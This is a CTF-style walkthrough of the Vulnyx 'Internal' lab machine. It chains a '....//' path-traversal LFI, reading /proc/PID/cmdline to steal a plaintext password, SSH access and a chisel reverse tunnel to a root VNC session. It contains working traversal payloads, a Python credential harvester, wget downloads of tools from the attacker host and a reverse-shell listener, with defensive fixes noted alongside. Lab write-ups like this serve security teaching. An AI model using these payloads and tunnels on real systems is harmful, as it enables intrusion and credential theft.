Vulnyx-Internal-Walkthrough
城南花已开

Information gathering

Service enumeration

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.221 08:00:27:8a:8c:19 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e1:d8:58 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.038 seconds (125.61 hosts/sec). 4 responded
export ip=192.168.60.221
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where scanning meets swagging. 😎

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.221:22
Open 192.168.60.221:80
Open 192.168.60.221:9999
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-03 08:51 CST
Initiating ARP Ping Scan at 08:51
Scanning 192.168.60.221 [1 port]
Completed ARP Ping Scan at 08:51, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:51
Completed Parallel DNS resolution of 1 host. at 08:51, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:51
Scanning 192.168.60.221 [3 ports]
Discovered open port 80/tcp on 192.168.60.221
Discovered open port 9999/tcp on 192.168.60.221
Discovered open port 22/tcp on 192.168.60.221
Completed SYN Stealth Scan at 08:51, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.221
Host is up, received arp-response (0.00039s latency).
Scanned at 2025-03-03 08:51:13 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
9999/tcp open abyss syn-ack ttl 64
MAC Address: 08:00:27:8A:8C:19 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Directory brute-force

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.221
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 30845]
/assets (Status: 301) [Size: 317] [--> http://192.168.60.221/assets/]
/forms (Status: 301) [Size: 316] [--> http://192.168.60.221/forms/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

Browsing port 80 turns up nothing of value.

[screenshot]

I tried the contact form to test for XSS, but it cannot be submitted.

LFI (file inclusion)

The page source, however, contains a link with a parameter: internal-item.php?item=index.html#hero

It is hidden in the logo lettering.

[screenshot]

Clicking it lands on index.html, but by way of the item parameter.

That smells like local file inclusion, so fuzz the parameter with an LFI wordlist.

❯ wfuzz -c -u "http://192.168.60.221/internal-item.php?item=FUZZ" -w ../thl/file_inclusion_linux.txt --hw 2
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.221/internal-item.php?item=FUZZ
Total requests: 2299

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000031: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
....//....//etc/passwd"
000000041: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//etc/passwd"
000000042: 200 28 L 40 W 1404 Ch "....//....//....//....//....//etc/passwd"
000000035: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
000000028: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
....//....//....//....//....//etc/passwd"
000000029: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
....//....//....//....//etc/passwd"
000000032: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
....//etc/passwd"
000000030: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
....//....//....//etc/passwd"
000000037: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//....//....//etc/passwd"
000000043: 200 28 L 40 W 1404 Ch "....//....//....//....//etc/passwd"
000000036: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
000000038: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//....//etc/passwd"
000000040: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//etc/passwd"
000000044: 200 28 L 40 W 1404 Ch "....//....//....//etc/passwd"
000000039: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//etc/passwd"
000000034: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//....//....//....//....//....//etc/pa
sswd"
000000027: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
....//....//....//....//....//....//etc/passwd"
000000025: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
....//....//....//....//....//....//....//....//etc/passwd"
000000033: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
etc/passwd"
000000026: 200 28 L 40 W 1404 Ch "....//....//....//....//....//....//....//....//....//....//....//....//....//....//
....//....//....//....//....//....//....//etc/passwd"

Total time: 1.729885
Processed Requests: 2299
Filtered Requests: 2279
Requests/sec.: 1328.989

Only the ....// payloads get through (--hw 2 hides the short error responses), which suggests the script strips ../ a single time, non-recursively: removing one ../ from ....// leaves ../ behind.

Pull /etc/passwd with curl to see which users have a login shell. This yields the admin user.

❯ curl "http://192.168.60.221/internal-item.php?item=....//....//....//....//etc/passwd" |grep /bin/bash
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1404 100 1404 0 0 599k 0 --:--:-- --:--:-- --:--:-- 685k
root:x:0:0:root:/root:/bin/bash
admin:x:1000:1000:admin,,,:/home/admin:/bin/bash
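Why the ....// form works, as an added example (not the source of internal-item.php, which this write-up never shows): the filter below is a guess that reproduces the observed behaviour, a single non-recursive removal of ../, placed next to a containment check that does not rely on string filtering at all. WEBROOT and the function names are assumptions.

```python
"""Non-recursive "../" stripping and the traversal bypass it invites.

Added example; not the target's real PHP. naive_sanitize() is a guess that
matches what the fuzzing showed: plain "../" payloads were filtered out,
"....//" payloads returned /etc/passwd. WEBROOT is an assumed document root.
"""
import os

WEBROOT = "/var/www/html"  # assumption: document root of the target


def naive_sanitize(item: str) -> str:
    """Guessed vulnerable filter: remove "../" once, left to right.
    "....//" loses its inner "../" and the leftover characters reassemble
    into "../", so the traversal survives."""
    return item.replace("../", "")


def vulnerable_resolve(item: str) -> str:
    """Path the vulnerable include would open after the naive filter."""
    return os.path.normpath(os.path.join(WEBROOT, naive_sanitize(item)))


def hardened_resolve(item: str) -> str:
    """Containment check: canonicalise the joined path and refuse anything
    that does not stay under the document root. NUL bytes are rejected too,
    since older PHP builds truncated paths at a NUL."""
    if "\x00" in item:
        raise ValueError("NUL byte in path")
    base = os.path.realpath(WEBROOT)
    target = os.path.realpath(os.path.join(base, item))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes document root: {target}")
    return target


def traversal_payload(target: str, depth: int = 4) -> str:
    """The payload used on the box: "....//" repeated `depth` times, which the
    naive filter turns into "../" repeated `depth` times."""
    return "....//" * depth + target.lstrip("/")


def is_blocked(resolver, item: str) -> bool:
    """True if the resolver refuses the item."""
    try:
        resolver(item)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = traversal_payload("/etc/passwd")
    print("vulnerable:", vulnerable_resolve(payload))   # /etc/passwd
    print("hardened:  ", hardened_resolve(payload))     # a nonexistent ".../" dir under WEBROOT
    print("hardened blocks plain traversal:", is_blocked(hardened_resolve, "../../../../etc/passwd"))
```

Against the hardened resolver the ....// trick is simply a directory named .... that does not exist; there is no string to outsmart, only a canonical path that must stay under the root.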

Port 9999, meanwhile, asks for HTTP Basic authentication.

[screenshot]

Fuzzing

Brute-forcing with this username gets nowhere.

But the LFI lets us read files under /proc.

On Linux, /proc (the proc filesystem) is a virtual filesystem that exposes information about the system and its running processes. It is generated on the fly by the kernel and contains files and subdirectories with live information on the kernel, hardware and processes. The entries that matter here:

  • Per-process directories: each numerically named subdirectory of /proc corresponds to a running process and is named after its PID. For example, /proc/1234 holds the information for PID 1234.
  • cmdline: the command-line arguments the process was started with.
  • status: process state, such as memory usage and scheduling priority.
  • cpuinfo: details about the CPU.
  • meminfo: system memory usage.

Enumerate PIDs and read each process's command-line arguments from cmdline.

Fuzz with wfuzz, showing only responses that contain admin.

❯ wfuzz -c -z range,1-1000 -u "http://192.168.60.221/internal-item.php?item=....//....//....//....//proc/FUZZ/cmdline" --ss 'admin'
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.221/internal-item.php?item=....//....//....//....//proc/FUZZ/cmdline
Total requests: 1000

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000346: 200 2 L 2 W 100 Ch "346"

Total time: 0
Processed Requests: 1000
Filtered Requests: 999
Requests/sec.: 0

PID 346 has matching arguments; curl it.

❯ curl "http://192.168.60.221/internal-item.php?item=....//....//....//....//proc/346/cmdline" --output -
<pre>
python3/home/admin/python3HTTPSAuthServer.py--port9999--authadmin:4dM1Nt3rN4LP4zZ</pre>

This yields the credential admin:4dM1Nt3rN4LP4zZ. The arguments in /proc/<pid>/cmdline are separated by NUL bytes, which the terminal does not print, so they run together as python3/home/admin/python3HTTPSAuthServer.py--port9999--auth... Secrets passed on a command line are readable by any local user this way, and here by anyone with a file read primitive.
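The enumeration above, as an added example that is not part of the original write-up: it reuses the target URL, the item parameter and the ....// bypass seen on the box, splits cmdline on the NUL separators and looks for the usual secret-carrying flags. The fetcher is pluggable so the parsing runs offline against constructed data; FAKE_PROC is made up to mirror the real PID 346 output, and the flag list is an assumption.

```python
"""Harvest secrets from /proc/<pid>/cmdline through the LFI.

Added example, not from the original write-up. The live fetcher targets
internal-item.php?item=; fake_fetch() answers from constructed data so the
logic can run without the box.
"""
import re
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Optional

TRAVERSAL = "....//" * 4          # bypass that survived the target's "../" filter
SECRET_FLAGS = {"--auth", "--password", "--passwd", "--pass", "--token", "--secret", "-p"}


def cmdline_item(pid: int) -> str:
    """Value for ?item= that reaches /proc/<pid>/cmdline after the filter."""
    return f"{TRAVERSAL}proc/{pid}/cmdline"


def parse_cmdline(raw: bytes) -> List[str]:
    """/proc/<pid>/cmdline separates argv entries with NUL bytes and ends with
    one. Terminals and browsers drop them, which is why the curl output in the
    write-up reads as a single run-together string."""
    parts = raw.split(b"\x00")
    if parts and parts[-1] == b"":
        parts.pop()
    return [p.decode("utf-8", "replace") for p in parts]


def find_credentials(argv: List[str]) -> Dict[str, str]:
    """Match the common shapes: "--auth user:pass", "--auth=user:pass", "-p secret"."""
    creds: Dict[str, str] = {}
    i = 0
    while i < len(argv):
        arg = argv[i]
        flag, sep, value = arg.partition("=")
        if sep and flag in SECRET_FLAGS:
            creds[flag] = value
        elif arg in SECRET_FLAGS and i + 1 < len(argv):
            creds[arg] = argv[i + 1]
            i += 1
        i += 1
    return creds


def http_fetcher(base_url: str) -> Callable[[str], Optional[bytes]]:
    """Fetcher for the live target. The include wraps output in <pre>...</pre>,
    so that wrapper is stripped before the bytes are parsed."""
    def fetch(item: str) -> Optional[bytes]:
        url = f"{base_url}?item={urllib.parse.quote(item, safe='/')}"
        try:
            with urllib.request.urlopen(url, timeout=5) as resp:
                body = resp.read()
        except OSError:               # URLError/HTTPError/timeouts all derive from OSError
            return None
        m = re.search(rb"<pre>(.*?)</pre>", body, re.S)
        return m.group(1) if m else body
    return fetch


def harvest(fetch: Callable[[str], Optional[bytes]], pids: Iterable[int]) -> Dict[int, Dict[str, str]]:
    """Walk the PID range and keep only processes whose argv carries a secret."""
    hits: Dict[int, Dict[str, str]] = {}
    for pid in pids:
        raw = fetch(cmdline_item(pid))
        if not raw:                   # no such PID, or a kernel thread with an empty cmdline
            continue
        creds = find_credentials(parse_cmdline(raw))
        if creds:
            hits[pid] = creds
    return hits


# Constructed stand-in for the target's /proc, mirroring the real PID 346.
FAKE_PROC: Dict[int, bytes] = {
    1: b"/sbin/init\x00",
    346: (b"python3\x00/home/admin/python3HTTPSAuthServer.py\x00"
          b"--port\x009999\x00--auth\x00admin:4dM1Nt3rN4LP4zZ\x00"),
}


def fake_fetch(item: str) -> Optional[bytes]:
    """Offline fetcher: answers only for cmdline paths present in FAKE_PROC."""
    m = re.fullmatch(r"(?:\.\.\.\.//)+proc/(\d+)/cmdline", item)
    return FAKE_PROC.get(int(m.group(1))) if m else None


if __name__ == "__main__":
    # Live: harvest(http_fetcher("http://192.168.60.221/internal-item.php"), range(1, 1000))
    print(harvest(fake_fetch, range(1, 1000)))
```

The fix on the server side is the same whatever the service: read the credential from a mode-0600 file or the environment rather than argv, and mount /proc with hidepid=2 so other local users cannot browse process directories at all.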

I tried logging in to port 9999 with this credential.

[screenshot]

Nothing useful there. Guessing the password is reused, try it against the other services.

User access

Try SSH; it works.

❯ ssh admin@$ip
[email protected]'s password:
Linux internal 5.10.0-22-amd64 #1 SMP Debian 5.10.178-3 (2023-04-22) x86_64
Last login: Mon May 8 17:18:54 2023 from 192.168.1.10
admin@internal:~$ cat user.txt
22c15f8a6b80b178f36f3fcf5053bd82

VNC port open

Checking locally listening ports shows 5901 open on loopback only; isn't that VNC? (5900 + N is VNC display :N, so this is display :1.)

admin@internal:/tmp$ ss -luntp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 5 127.0.0.1:5901 0.0.0.0:*
tcp LISTEN 0 5 0.0.0.0:9999 0.0.0.0:* users:(("python3",pid=346,fd=3))
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 5 [::1]:5901 [::]:*
tcp LISTEN 0 511 *:80 *:*
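The loopback-only listener could have been spotted before there was a shell: /proc/net/tcp is world-readable and holds the same data ss presents, so the LFI can read it as ....//....//....//....//proc/net/tcp. An added example (not part of the original write-up) that parses that format; SAMPLE is constructed to match the ss output above, with 22 and 9999 on all interfaces and 5901 on loopback only. IPv6 listeners such as *:80 and [::]:22 live in /proc/net/tcp6, which uses 128-bit hex addresses and is not handled here.

```python
"""List listening TCP sockets from /proc/net/tcp (IPv4 only).

Added example, not from the original write-up. Each row stores the local
address as little-endian 32-bit hex, the port as big-endian hex, and the
socket state in the "st" column (0A = LISTEN). SAMPLE is constructed.
"""
import socket
import struct
from typing import Dict, List

TCP_LISTEN = 0x0A


def decode_addr(field: str):
    """Decode "0100007F:170D" -> ("127.0.0.1", 5901)."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def listening_sockets(proc_net_tcp: str) -> List[Dict[str, object]]:
    """Rows in LISTEN state, sorted by port, with the owning uid."""
    rows = []
    for line in proc_net_tcp.splitlines()[1:]:      # first line is the header
        cols = line.split()
        if len(cols) < 8 or int(cols[3], 16) != TCP_LISTEN:
            continue
        ip, port = decode_addr(cols[1])
        rows.append({"ip": ip, "port": port, "uid": int(cols[7])})
    return sorted(rows, key=lambda r: r["port"])


def loopback_only(rows) -> List[int]:
    """Ports bound to 127.0.0.0/8 and nothing else: the ones a pivot must forward."""
    exposed = {r["port"] for r in rows if not r["ip"].startswith("127.")}
    return sorted({r["port"] for r in rows
                   if r["ip"].startswith("127.") and r["port"] not in exposed})


# Constructed to mirror the box: sshd and the python3 server on 0.0.0.0,
# Xtigervnc on 127.0.0.1:5901 as root, plus one established SSH session.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 14021 1 0000000000000000 100 0 0 10 0
   1: 0100007F:170D 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 15311 1 0000000000000000 100 0 0 10 0
   2: 00000000:270F 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 15402 1 0000000000000000 100 0 0 10 0
   3: DD3CA8C0:0016 643CA8C0:C7A4 01 00000000:00000000 02:000A3F2C 00000000     0        0 21504 4 0000000000000000 20 4 31 10 -1
"""

if __name__ == "__main__":
    rows = listening_sockets(SAMPLE)
    for r in rows:
        print(f"{r['ip']}:{r['port']}  uid={r['uid']}")
    print("needs forwarding:", loopback_only(rows))   # [5901]
```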

linpeas.sh also turns up TigerVNC-related files.

╔══════════╣ Analyzing VNC Files (limit 70)

-rw-r--r-- 1 root root 4789 ene 26 2022 /usr/share/man/man5/tigervnc.conf.5x.gz
-rw-r--r-- 1 root root 162 ene 26 2022 /var/lib/dpkg/info/tigervnc-common.conffiles
/etc/pam.d/tigervnc
/etc/tigervnc/openssl-ecparams.pem
/etc/tigervnc/openssl.cnf
/etc/tigervnc/vncserver-config-defaults
/etc/tigervnc/vncserver-config-mandatory
-rw-r--r-- 1 root root 57 ene 26 2022 /var/lib/dpkg/info/tigervnc-standalone-server.conffiles
/etc/X11/Xtigervnc-session
/etc/tigervnc/vncserver.users

pspy64 shows root running TigerVNC, with the password file at /root/.vnc/passwd.

2025/03/03 03:10:25 CMD: UID=0     PID=456    | /usr/bin/Xtigervnc :1 -rfbport 5901 -localhost=1 -SecurityTypes VncAuth -PasswordFile /root/.vnc/passwd -ClientWaitTimeMillis 30000 -geometry 1920x1200 -desktop internal:1 (root) -depth 24 -auth /root/.Xauthority
2025/03/03 03:10:25 CMD: UID=0 PID=454 | /usr/bin/perl /usr/bin/tigervncserver -xstartup /usr/bin/xterm

The admin home directory also contains a hidden directory named ... (three dots).

admin@internal:~$ ls -al
total 44
drwx------ 4 admin admin 4096 may 8 2023 .
drwxr-xr-x 3 root root 4096 may 8 2023 ..
drwx------ 2 admin admin 4096 may 8 2023 ...
lrwxrwxrwx 1 root root 9 abr 23 2023 .bash_history -> /dev/null
-rw------- 1 admin admin 220 ene 15 2023 .bash_logout
-rw------- 1 admin admin 3526 ene 15 2023 .bashrc
drwxr-xr-x 3 admin admin 4096 may 8 2023 .local
-rw------- 1 admin admin 807 ene 15 2023 .profile
-rwx------ 1 admin admin 5504 may 8 2023 python3HTTPSAuthServer.py
-rw-r--r-- 1 admin admin 66 may 8 2023 .selected_editor
-r-------- 1 admin admin 33 may 8 2023 user.txt
admin@internal:~$ cd ...
admin@internal:~/...$ ls -al
total 12
drwx------ 2 admin admin 4096 may 8 2023 .
drwx------ 4 admin admin 4096 may 8 2023 ..
-rw-r--r-- 1 admin admin 198 may 8 2023 internalkey.zip

Copy it to the attack box. The archive is password-protected, so try cracking it with john.

❯ scp admin@$ip:~/.../internalkey.zip .
[email protected]'s password:
internalkey.zip 100% 198 257.3KB/s 00:00
❯ x internalkey.zip
extract: extracting to internalkey
Archive: /home/Pepster/vulnyx/internalkey.zip
[/home/Pepster/vulnyx/internalkey.zip] passwd password: %
❯ zip2john internalkey.zip >hash
ver 1.0 efh 5455 efh 7875 internalkey.zip/passwd PKZIP Encr: 2b chk, TS_chk, cmplen=20, decmplen=8, crc=16FA5922 ts=8B17 cs=8b17 type=0
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2025-03-03 10:16) 0g/s 14488Kp/s 14488Kc/s 14488KC/s "2parrow"..*7¡Vamos!
Session completed.

No luck with rockyou; hashcat does not crack it either.

Guess that it is the same password as SSH, and it is.

admin@internal:~/...$ unzip internalkey.zip
Archive: internalkey.zip
[internalkey.zip] passwd password:
extracting: passwd
admin@internal:~/...$ cat passwd
x
4Mw

Root privilege escalation

Guess that this is a backup of the VNC password file. It fits: a TigerVNC passwd file is 8 bytes, the password obfuscated with a fixed DES key, which matches decmplen=8 in the zip2john output, and vncviewer -passwd takes the file as-is, so it never needs to be decrypted.

Port forwarding

Use socat to expose the loopback port on an external one. Note that this publishes a root VNC session to the whole subnet; since we already have SSH credentials, ssh -L 5901:127.0.0.1:5901 admin@$ip would do the same job without uploading a binary or exposing the port.

admin@internal:/tmp$ wget 192.168.60.100/socat
--2025-03-03 03:40:11-- http://192.168.60.100/socat
Conectando con 192.168.60.100:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 375176 (366K) [application/octet-stream]
Grabando a: «socat»

socat 100%[=======================================================================>] 366,38K --.-KB/s en 0,006s

2025-03-03 03:40:11 (64,8 MB/s) - «socat» guardado [375176/375176]

admin@internal:/tmp$ chmod +x socat
admin@internal:/tmp$ ./socat TCP-LISTEN:5602,fork TCP4:127.0.0.1:5601&
[1] 13598

But something seems wrong with socat: connection refused.

❯ vncviewer -passwd passwd $ip:5602
vncviewer: VNC server closed connection
------------------------------
admin@internal:~/...$ 2025/03/03 03:45:38 socat[13637] E connect(5, AF=2 127.0.0.1:5601, 16): Connection refused
2025/03/03 03:45:41 socat[13638] E connect(5, AF=2 127.0.0.1:5601, 16): Connection refused
2025/03/03 03:45:58 socat[13639] E connect(5, AF=2 127.0.0.1:5601, 16): Connection refused

Try chisel to forward the port back to Kali instead.

admin@internal:/tmp$ wget 192.168.60.100/chisel
--2025-03-03 03:48:00-- http://192.168.60.100/chisel
Conectando con 192.168.60.100:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 9371800 (8,9M) [application/octet-stream]
Grabando a: «chisel»

chisel 100%[=======================================================================>] 8,94M --.-KB/s en 0,06s

2025-03-03 03:48:00 (142 MB/s) - «chisel» guardado [9371800/9371800]

admin@internal:/tmp$ chmod +x chisel
admin@internal:/tmp$ ./chisel client 192.168.60.100:1111 R:5601:127.0.0.1:5601&
[1] 13653
admin@internal:/tmp$ 2025/03/03 03:50:16 client: Connecting to ws://192.168.60.100:1111
2025/03/03 03:50:16 client: Connected (Latency 1.319439ms)
------------------------------------------------
❯ chisel server --reverse -p 1111 --reverse
2025/03/03 10:49:37 server: Reverse tunnelling enabled
2025/03/03 10:49:37 server: Fingerprint UMeZCGj/6A65jgTUtq89qTSKk0HrAr6y6qd+o48oz2w=
2025/03/03 10:49:37 server: Listening on http://0.0.0.0:1111
2025/03/03 10:50:15 server: session#1: Client version (1.10.1) differs from server version (1.10.1-0kali1)
2025/03/03 10:50:15 server: session#1: tun: proxy#R:5601=>5601: Listening

Damn, I realized I had messed up: I typed the wrong port. It is 5901, not 5601.

admin@internal:/tmp$ kill -9 13653
admin@internal:/tmp$ ./chisel client 192.168.60.100:1111 R:5901:127.0.0.1:5901&
[2] 13661
[1] Terminado (killed) ./chisel client 192.168.60.100:1111 R:5601:127.0.0.1:5601
admin@internal:/tmp$ 2025/03/03 03:52:35 client: Connecting to ws://192.168.60.100:1111
2025/03/03 03:52:35 client: Connected (Latency 1.419383ms)

Connect to VNC on local port 5901.

❯ vncviewer -passwd passwd 127.0.0.1:5901
Connected to RFB server, using protocol version 3.8
Performing standard VNC authentication
Authentication successful
Desktop name "internal:1 (root)"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

[screenshot]

The session is a root xterm, so pop a shell back.

❯ pwncat-cs -lp 4444
[10:54:36] Welcome to pwncat 🐈! __main__.py:164
[10:55:08] received connection from 192.168.60.221:38044 bind.py:84
[10:55:08] 0.0.0.0:4444: normalizing shell path manager.py:957
[10:55:09] 192.168.60.221:38044: registered new host w/ db manager.py:957
(local) pwncat$
(remote) root@internal:/root# id
uid=0(root) gid=0(root) grupos=0(root)
(remote) root@internal:/root# cat /root/root.txt
94f50378a53c0c1eb0899494e352766b


Turns out socat was fine; I had simply typed the wrong port. With 5901 it connects too.

admin@internal:/tmp$ ./socat TCP-LISTEN:5902,fork TCP4:127.0.0.1:5901&
[1] 13728
----------------------------------------
❯ vncviewer -passwd passwd $ip:5902
Connected to RFB server, using protocol version 3.8
Performing standard VNC authentication
Authentication successful
Desktop name "internal:1 (root)"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
